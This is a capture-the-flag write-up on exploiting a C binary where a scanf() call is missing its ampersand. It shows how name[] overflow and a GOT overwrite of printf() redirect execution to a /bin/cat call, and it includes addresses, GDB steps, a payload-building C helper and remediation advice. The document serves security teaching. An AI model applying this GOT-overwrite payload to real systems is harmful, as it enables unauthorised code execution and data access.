This report can be read both on this site and in its original report form. Reading the original report form is highly recommended because it is better formatted.
Insecure code in the passcode.c file gave the user control over memory that is meant to be inaccessible. The lack of boundary checks in the login() function, coupled with improper use of the libc scanf() function, led to the execution of the /bin/cat system command when a carefully constructed malicious string was supplied. Specifically, the second argument of scanf() was not a pointer to an integer because it was not prefixed with an ampersand. By taking advantage of this insecure code and the fact that the binary is dynamically linked, an attacker can overwrite the GOT entry of printf() or fflush() and redirect execution to any location in the binary’s memory.
Attack Narrative
The source code and compiled binary of the program were provided. Furthermore, the SSH credentials of the owner of this binary were given:
Username: Passcode
Password: guest
Binary Behavior
Source Code
Before executing the binary, the program’s behavior will first be analyzed:
There are three user-created functions in total: main(), welcome(), and login(). The main() function is not of interest, as it only calls printf(), welcome(), and login(). In welcome(), a 100-byte buffer name[100] is declared. The scanf() function is then called with %100s as the first argument; up to 100 characters of input are read into the buffer and subsequently printed with printf() (this behavior is examined in the Taking Advantage of name[100] section). After welcome() returns, the login() function is executed.
Two variables are declared: int passcode1 and int passcode2. Following these declarations, scanf("%d", passcode1) is called, but the second argument is not a pointer to an integer (it is not prefixed with the ampersand symbol), so scanf() treats the current value of passcode1 as the address to write to. Next, fflush(stdin) is called as opposed to fflush(stdout). Incidentally, the former is not recommended: fflush() is defined only for output streams, where it writes the buffered data out, and calling it on an input stream is undefined behavior[1]. The scanf() function is then called again, and once more the second argument is not prefixed with the ampersand symbol. Lastly, an if statement checks whether passcode1 is equal to 338150 and passcode2 is equal to 13371337. If both conditions hold, the flag located on the target system is read out.
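The difference between the buggy call and the intended one comes down to what is passed as the destination. The following is a minimal sketch, not code from passcode.c: parse_passcode is a hypothetical helper, and it uses sscanf() on a string instead of scanf() on stdin purely so that the behavior is easy to check.

```c
#include <stdio.h>

/* Hypothetical helper (not part of passcode.c).
 * Parses one decimal integer from `input` into *out.
 * Returns 1 on success and 0 if no integer could be parsed. */
int parse_passcode(const char *input, int *out)
{
    /* Buggy form described in the report:
     *     scanf("%d", passcode1);
     * This passes the VALUE of passcode1, which scanf() then uses as
     * the address to store the parsed number at.
     *
     * Intended form: pass the ADDRESS of the destination, i.e.
     *     scanf("%d", &passcode1);
     * Here `out` is already an int pointer, so it is passed directly. */
    return sscanf(input, "%d", out) == 1;
}
```

A caller would write `int passcode1; parse_passcode("338150", &passcode1);`, with the ampersand appearing at the call site.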
Executing Binary
Executing the binary with the input of 338150 for passcode1 and 13371337 for passcode2 results in a segmentation fault:
This behavior can be further examined using GDB, a GNU project debugger useful for dynamic analysis[2].
GDB
Examining Segmentation Fault
Running this binary in GDB, it can be seen that the program experiences a segmentation fault upon calling scanf() when moving EAX to EDX.
Therefore, scanf() attempted to store the parsed input at whatever address its second argument contained. Whoever controls the value held in passcode1 controls which memory location scanf() overwrites.
Taking Advantage of name[100]
Recall that welcome() allocates only 100 bytes for user input and calls scanf() with the %100s format specifier. scanf() performs no boundary checks of its own on string input; the only limit is the field width the developer supplies, so an unsafe width lets user input overflow the memory allocated for the buffer. In this binary the field width is 100 (%100s) and the name buffer is also 100 bytes, so an input of 100 or more characters fills the entire buffer and the terminating null byte spills into the memory immediately after it. Because the stack memory used by welcome() is reused by login(), this gives the user control over otherwise inaccessible memory located within login(). To demonstrate this concept, observe the following:
First, the login() function is disassembled to find when the initial if statement occurs.
Note the line highlighted in red which signifies the beginning of the if statement. The hex value 0x528e6 (338150 in decimal) is compared to ebp-0x10, thus at this point in memory lies passcode1. By the same token, the line highlighted in purple represents passcode2 in which 0xcc07c9 (13371337 in decimal) is compared to ebp-0xc.
After setting a breakpoint at login+97 (0x080485c5), the program is run with a username of 101 A’s.
Now looking at the value located at ebp-0x10 shows something of interest:
41 in hex is ‘A’. Therefore, upon passing a large input to the name[100] buffer, the value for passcode1 can be written into. Additionally, observe the value for passcode2 located at ebp-0xc:
The null byte, which is automatically appended to a string to signify its end, leaks into passcode2, as can be seen from the trailing 0’s. Moreover, note that although 101 A’s were passed, the final A did not spill into passcode2 because of the field width specification (namely %100s) in the scanf("%100s", name) call.
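The overlap observed above can be modelled with a plain byte array. This is only a sketch under stated assumptions: the offsets of passcode1 (ebp-0x10) and passcode2 (ebp-0xc) come from the disassembly, while the start of name[100] at ebp-0x70 is inferred from the observation that the last four A’s land in passcode1. The function names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

enum {
    FRAME_SIZE    = 0x70,         /* bytes from ebp-0x70 up to ebp            */
    NAME_OFF      = 0,            /* name[100] at ebp-0x70 (inferred)         */
    PASSCODE1_OFF = 0x70 - 0x10,  /* passcode1 at ebp-0x10 -> byte offset 96  */
    PASSCODE2_OFF = 0x70 - 0x0c   /* passcode2 at ebp-0xc  -> byte offset 100 */
};

/* Leaves `frame` the way scanf("%100s", name) would after reading
 * an input of 100 or more 'A' characters. */
void simulate_welcome(unsigned char frame[FRAME_SIZE])
{
    memset(frame, 0xff, FRAME_SIZE);       /* stand-in for stale stack data */
    memset(frame + NAME_OFF, 'A', 100);    /* %100s stores at most 100 chars */
    frame[NAME_OFF + 100] = '\0';          /* terminator lands in byte 101   */
}

/* Reads the 4-byte stack slot starting at byte offset `off`. */
uint32_t read_slot(const unsigned char frame[FRAME_SIZE], int off)
{
    uint32_t v;
    memcpy(&v, frame + off, sizeof v);
    return v;
}
```

After simulate_welcome(), read_slot(frame, PASSCODE1_OFF) yields 0x41414141, and the first byte of the passcode2 slot is the null terminator, matching what GDB shows.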
Exploit Construction
Where to Jump
Due to the unstable nature of this binary, passing in 338150 as passcode1 and 13371337 as passcode2 does not result in the expected execution of /bin/cat; instead, a segmentation fault occurs (see Examining Segmentation Fault). Therefore, in order to execute /bin/cat, the program must be manipulated to jump to an address after the if statement and before the call to the system command. Looking at the disassembly of the login() function, this leaves the following addresses: 0x080485d7, 0x080485de, and 0x080485e3. For the purposes of this report, the 0x080485d7 address is used, which is 134514135 in decimal.
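The decimal form matters because the value reaches the program through scanf("%d"), which parses decimal text rather than raw bytes. A small sketch of the conversion follows; addr_to_decimal is a hypothetical helper introduced here for illustration.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: formats a 32-bit address as the signed decimal
 * text that scanf("%d") parses. Returns the number of characters
 * written, excluding the terminating null byte. */
int addr_to_decimal(uint32_t addr, char *buf, size_t len)
{
    /* %d reads a signed int, so an address above 0x7fffffff would have
     * to be supplied as a negative number; hence the signed cast. */
    return snprintf(buf, len, "%" PRId32, (int32_t)addr);
}
```

For 0x080485d7 this produces the string 134514135, the value quoted above.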
Which Function to Overwrite
With the established notion that one of the aforementioned values is necessary for the desired jump to the system call, the next question is “Which memory address should be overwritten with the desired value?”. Ideally, the memory of a used function can be overwritten so as to point to one of the desired values.
Using the readelf -a passcode command, the file header, sections, and symbols (along with a lot of other information) can be seen. This facilitates the process of finding where functions are mapped onto memory.
There are nine functions in total that readelf found. However, looking at the Source Code, only two functions are used after the first scanf() and before the system call: printf() and fflush(). Either function will work for this exploit; in this report the printf() function is utilized. Because this binary is little-endian, the address of the GOT entry of printf() (0x0804a000) is written in bytes as \x00\xa0\x04\x08.
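Putting the pieces together, the malicious input can be sketched as three parts: filler up to the slot reused by passcode1, the GOT entry address in little-endian order, and the jump target as decimal text for scanf("%d"). The layout below is an illustration rather than the exact payload used in the original report; build_payload and FILLER_LEN are hypothetical names, and the 96-byte filler length assumes passcode1 overlaps the last four bytes of name[100].

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FILLER_LEN 96u  /* bytes of name[] before the slot reused by passcode1 */

/* Hypothetical helper. Builds:
 *   96 filler bytes | got_entry (4 bytes, little-endian) | target in decimal | '\n'
 * Returns the payload length, or 0 if `buf` is too small. */
size_t build_payload(uint32_t got_entry, uint32_t target,
                     unsigned char *buf, size_t len)
{
    char dec[16];
    int n = snprintf(dec, sizeof dec, "%" PRIu32, target);
    if (n < 0 || (size_t)n >= sizeof dec)
        return 0;

    size_t total = FILLER_LEN + 4u + (size_t)n + 1u;
    if (total > len)
        return 0;

    memset(buf, 'A', FILLER_LEN);                 /* fills name[0..95] */
    for (unsigned i = 0; i < 4; i++)              /* least significant byte first */
        buf[FILLER_LEN + i] = (unsigned char)(got_entry >> (8 * i));
    memcpy(buf + FILLER_LEN + 4, dec, (size_t)n); /* consumed by scanf("%d") */
    buf[total - 1] = '\n';
    return total;
}
```

Since the payload contains a null byte, it would have to be emitted with a length-aware call such as fwrite(buf, 1, n, stdout) rather than a string function, and then piped into the binary.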
The binary exploited in this report was unstripped and dynamically linked:
The fact that it was dynamically linked played an essential role in making the exploit succeed. To understand exactly how it worked, it is important to realize what dynamic linking is and how it operates.
Understanding Dynamic Linking
When a binary is dynamically linked, the libc calls within the program do not point to any meaningful addresses. Take the following snippet from passcode for example:
Note the text highlighted in red. The program calls fflush() and printf(), which are at 0x8048430 and 0x8048420 respectively. Since this binary is dynamically linked, before the binary is ever run, fflush() and printf() (and any other libc function for that matter) refer to placeholder addresses such as 0x00000000. However, once the program is loaded, these addresses are resolved with the help of the Global Offset Table (GOT) and the Procedure Linkage Table (PLT), a table which converts position-independent function calls to absolute locations[3]. When a libc function is called, the first thing the PLT does is jump to the GOT entry of the called function. The GOT maps symbols (such as printf()) to their actual location[4]. Thus, when the exploit was passed into the binary, the GOT entry which maps printf() to its actual location was overwritten to point to 0x080485d7 instead.
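The indirection described above behaves much like a call through a writable function pointer. The following is a deliberately simplified model, not how the dynamic linker is implemented: it omits lazy binding, and every name in it is hypothetical.

```c
typedef int (*fn_t)(void);

/* Stand-in for the real printf() inside libc. */
int real_printf_stub(void) { return 1; }

/* Stand-in for the code at 0x080485d7, just before the system() call. */
int login_ok_path(void) { return 2; }

/* A one-entry "GOT": a writable slot holding the resolved address. */
static fn_t got_printf = real_printf_stub;

/* The "PLT stub": an indirect jump through the GOT slot. */
int call_printf_via_plt(void)
{
    return got_printf();
}

/* What the stray scanf() write achieves: new contents for the slot. */
void overwrite_got(fn_t target)
{
    got_printf = target;
}
```

Before overwrite_got(login_ok_path) is called, call_printf_via_plt() reaches the real function; afterwards the same call site lands in login_ok_path() without the calling code having changed.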
Examining the GOT Overwrite in GDB
The way the binary handles the malicious input can be examined more in detail within GDB. After disassembling the login() function, it can be seen that the printf() call that occurs after scanf() is at login+60 (or 0x080485a0):
After setting a breakpoint at this address and passing in the exploit, the breakpoint gets hit:
It was established that this exploit works. Therefore, somewhere within memory the address 0x80485d7 is loaded up. To find its exact location, the info proc mappings and find command within GDB can be utilized:
Recall that 134514135 is 0x080485d7 in hex and it points to the location between the if statement and system call.
Note that the find command has the syntax find start_address, end_address, what_to_look_for.
The pointer for printf() was successfully overwritten with 0x080485d7. Observe that this is different from the printf() pointer before the exploit:
When stepping one instruction from the printf() call, the program is expected to look up the GOT entry of printf(). The program is then tricked into believing that the code for printf() can be found at 0x080485d7, and EIP will therefore point to 0x080485d7:
Observe the instruction pointer (EIP) which jumped to the location between the if statement and system call.
Conclusion
The binary was successfully exploited which resulted in the leakage of otherwise inaccessible data. Compiler warnings should never be ignored. Unsafe practices involving user-input can lead to security holes. The scanf() function was improperly used, and is not recommended when dealing with strings (unless the developer is careful of the field width specifier and allocated buffer size). Furthermore, the second argument of scanf() was not prepended with the ampersand symbol, which allowed for the passing of an address causing the overwrite of printf(). The following remediations should be strongly considered:
Prepend the ampersand symbol (&) to the variable passed as the second argument of scanf()
Failure to do so allowed for the direct passing of an address
When dealing with strings, use a field width that is at most one less than the size of the buffer
Due to name[100] having 100 bytes, the scanf() field width specifier should be 99 instead of 100 to take into account the null byte
Use sscanf() in conjunction with getline() when dealing with user-inputted strings
getline() automatically allocates an appropriate buffer size to safely fit the input string[5]
The buffer of getline() can then be parsed with sscanf()
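The remediations above could look roughly like the following. This is a sketch assuming a POSIX system (getline() is not part of ISO C); read_name, read_passcode, and NAME_LEN are hypothetical names, and the functions take a FILE pointer so they can be used with stdin or any other stream.

```c
#define _POSIX_C_SOURCE 200809L  /* exposes getline() on POSIX systems */
#include <stdio.h>
#include <stdlib.h>

#define NAME_LEN 100

/* Reads one line from `in` and copies its first word into `name`.
 * The field width is NAME_LEN - 1 so the null byte always fits.
 * Returns 1 on success, 0 on EOF or an empty line. */
int read_name(FILE *in, char name[NAME_LEN])
{
    char *line = NULL;   /* getline() allocates and grows this buffer */
    size_t cap = 0;
    int ok = 0;

    if (getline(&line, &cap, in) != -1)
        ok = (sscanf(line, "%99s", name) == 1);

    free(line);
    return ok;
}

/* Reads one line from `in` and parses a decimal integer into *out.
 * Returns 1 on success, 0 on EOF or malformed input. */
int read_passcode(FILE *in, int *out)
{
    char *line = NULL;
    size_t cap = 0;
    int ok = 0;

    if (getline(&line, &cap, in) != -1)
        ok = (sscanf(line, "%d", out) == 1);  /* `out` is already a pointer */

    free(line);
    return ok;
}
```

In login(), the calls would then take the form read_passcode(stdin, &passcode1), with the ampersand supplying the address that the original code omitted.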
The aforementioned remediations should be followed as soon as possible to prevent the attack described in this report. It is essential that the developer follow safe programming practices especially when dealing with user-input.